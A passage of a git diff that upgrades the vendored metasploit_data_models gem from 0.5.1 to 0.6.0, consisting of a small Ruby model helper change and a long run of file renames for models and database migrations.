is `nil` + # + # @param [Array>, nil] params + # @return [Array<>] params if not `nil` + # @return [nil] if params is `nil` + def normalize_params(params) + params || default_params + end + + # switch back to public for load hooks + public ActiveSupport.run_load_hooks(:mdm_web_vuln, self) end diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/wmap_request.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/wmap_request.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/wmap_request.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/wmap_request.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/wmap_target.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/wmap_target.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/wmap_target.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/wmap_target.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/workspace.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/workspace.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/app/models/mdm/workspace.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/app/models/mdm/workspace.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/bin/mdm_console b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/bin/mdm_console similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/bin/mdm_console rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/bin/mdm_console diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/console_db.yml b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/console_db.yml similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/console_db.yml rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/console_db.yml diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/000_create_tables.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/000_create_tables.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/000_create_tables.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/000_create_tables.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/001_add_wmap_tables.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/001_add_wmap_tables.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/001_add_wmap_tables.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/001_add_wmap_tables.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/002_add_workspaces.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/002_add_workspaces.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/002_add_workspaces.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/002_add_workspaces.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/003_move_notes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/003_move_notes.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/003_move_notes.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/003_move_notes.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/004_add_events_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/004_add_events_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/004_add_events_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/004_add_events_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/005_expand_info.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/005_expand_info.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/005_expand_info.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/005_expand_info.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/006_add_timestamps.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/006_add_timestamps.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/006_add_timestamps.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/006_add_timestamps.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/007_add_loots.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/007_add_loots.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/007_add_loots.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/007_add_loots.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/008_create_users.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/008_create_users.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/008_create_users.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/008_create_users.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/009_add_loots_ctype.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/009_add_loots_ctype.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/009_add_loots_ctype.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/009_add_loots_ctype.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/010_add_alert_fields.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/010_add_alert_fields.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/010_add_alert_fields.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/010_add_alert_fields.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/011_add_reports.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/011_add_reports.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/011_add_reports.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/011_add_reports.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/012_add_tasks.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/012_add_tasks.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/012_add_tasks.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/012_add_tasks.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/013_add_tasks_result.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/013_add_tasks_result.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/013_add_tasks_result.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/013_add_tasks_result.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/014_add_loots_fields.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/014_add_loots_fields.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/014_add_loots_fields.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/014_add_loots_fields.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/015_rename_user.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/015_rename_user.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/015_rename_user.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/015_rename_user.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/016_add_host_purpose.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/016_add_host_purpose.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/016_add_host_purpose.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/016_add_host_purpose.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/017_expand_info2.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/017_expand_info2.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/017_expand_info2.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/017_expand_info2.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/018_add_workspace_user_info.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/018_add_workspace_user_info.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/018_add_workspace_user_info.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/018_add_workspace_user_info.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/019_add_workspace_desc.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/019_add_workspace_desc.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/019_add_workspace_desc.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/019_add_workspace_desc.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/020_add_user_preferences.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/020_add_user_preferences.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/020_add_user_preferences.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/020_add_user_preferences.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/021_standardize_info_and_data.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/021_standardize_info_and_data.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/021_standardize_info_and_data.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/021_standardize_info_and_data.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/022_enlarge_event_info.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/022_enlarge_event_info.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/022_enlarge_event_info.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/022_enlarge_event_info.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/023_add_report_downloaded_at.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/023_add_report_downloaded_at.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/023_add_report_downloaded_at.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/023_add_report_downloaded_at.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/024_convert_service_info_to_text.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/024_convert_service_info_to_text.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/024_convert_service_info_to_text.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/024_convert_service_info_to_text.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/025_add_user_admin.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/025_add_user_admin.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/025_add_user_admin.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/025_add_user_admin.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/026_add_creds_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/026_add_creds_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/026_add_creds_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/026_add_creds_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100819123300_migrate_cred_data.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100819123300_migrate_cred_data.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100819123300_migrate_cred_data.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100819123300_migrate_cred_data.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100824151500_add_exploited_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100824151500_add_exploited_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100824151500_add_exploited_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100824151500_add_exploited_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100908001428_add_owner_to_workspaces.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100908001428_add_owner_to_workspaces.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100908001428_add_owner_to_workspaces.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100908001428_add_owner_to_workspaces.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100911122000_add_report_templates.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100911122000_add_report_templates.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100911122000_add_report_templates.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100911122000_add_report_templates.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916151530_require_admin_flag.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100916151530_require_admin_flag.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916151530_require_admin_flag.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100916151530_require_admin_flag.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916175000_add_campaigns_and_templates.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100916175000_add_campaigns_and_templates.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100916175000_add_campaigns_and_templates.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100916175000_add_campaigns_and_templates.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100920012100_add_generate_exe_column.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100920012100_add_generate_exe_column.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100920012100_add_generate_exe_column.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100920012100_add_generate_exe_column.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100926214000_add_template_prefs.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100926214000_add_template_prefs.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20100926214000_add_template_prefs.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20100926214000_add_template_prefs.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101001000000_add_web_tables.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101001000000_add_web_tables.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101001000000_add_web_tables.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101001000000_add_web_tables.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101002000000_add_query.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101002000000_add_query.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101002000000_add_query.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101002000000_add_query.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101007000000_add_vuln_info.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101007000000_add_vuln_info.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101007000000_add_vuln_info.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101007000000_add_vuln_info.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101008111800_add_clients_to_campaigns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101008111800_add_clients_to_campaigns.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101008111800_add_clients_to_campaigns.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101008111800_add_clients_to_campaigns.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101009023300_add_campaign_attachments.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101009023300_add_campaign_attachments.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101009023300_add_campaign_attachments.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101009023300_add_campaign_attachments.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101104135100_add_imported_creds.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101104135100_add_imported_creds.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101104135100_add_imported_creds.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101104135100_add_imported_creds.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000000_fix_web_tables.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101203000000_fix_web_tables.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000000_fix_web_tables.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101203000000_fix_web_tables.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000001_expand_host_comment.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101203000001_expand_host_comment.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101203000001_expand_host_comment.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101203000001_expand_host_comment.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101206212033_add_limit_to_network_to_workspaces.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101206212033_add_limit_to_network_to_workspaces.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20101206212033_add_limit_to_network_to_workspaces.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20101206212033_add_limit_to_network_to_workspaces.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110112154300_add_module_uuid_to_tasks.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110112154300_add_module_uuid_to_tasks.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110112154300_add_module_uuid_to_tasks.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110112154300_add_module_uuid_to_tasks.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110204112800_add_host_tags.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110204112800_add_host_tags.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110204112800_add_host_tags.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110204112800_add_host_tags.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110317144932_add_session_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110317144932_add_session_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110317144932_add_session_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110317144932_add_session_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110414180600_add_local_id_to_session_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110414180600_add_local_id_to_session_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110414180600_add_local_id_to_session_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110414180600_add_local_id_to_session_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110415175705_add_routes_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110415175705_add_routes_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110415175705_add_routes_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110415175705_add_routes_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110422000000_convert_binary.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110422000000_convert_binary.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110422000000_convert_binary.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110422000000_convert_binary.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110425095900_add_last_seen_to_sessions.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110425095900_add_last_seen_to_sessions.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110425095900_add_last_seen_to_sessions.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110425095900_add_last_seen_to_sessions.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110513143900_track_successful_exploits.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110513143900_track_successful_exploits.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110513143900_track_successful_exploits.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110513143900_track_successful_exploits.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110517160800_rename_and_prune_nessus_vulns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110517160800_rename_and_prune_nessus_vulns.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110517160800_rename_and_prune_nessus_vulns.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110517160800_rename_and_prune_nessus_vulns.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000000_add_task_id_to_reports_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110527000000_add_task_id_to_reports_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000000_add_task_id_to_reports_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110527000000_add_task_id_to_reports_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000001_add_api_keys_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110527000001_add_api_keys_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110527000001_add_api_keys_table.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110527000001_add_api_keys_table.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110606000001_add_macros_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110606000001_add_macros_table.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/db/migrate/20110606000001_add_macros_table.rb rename to 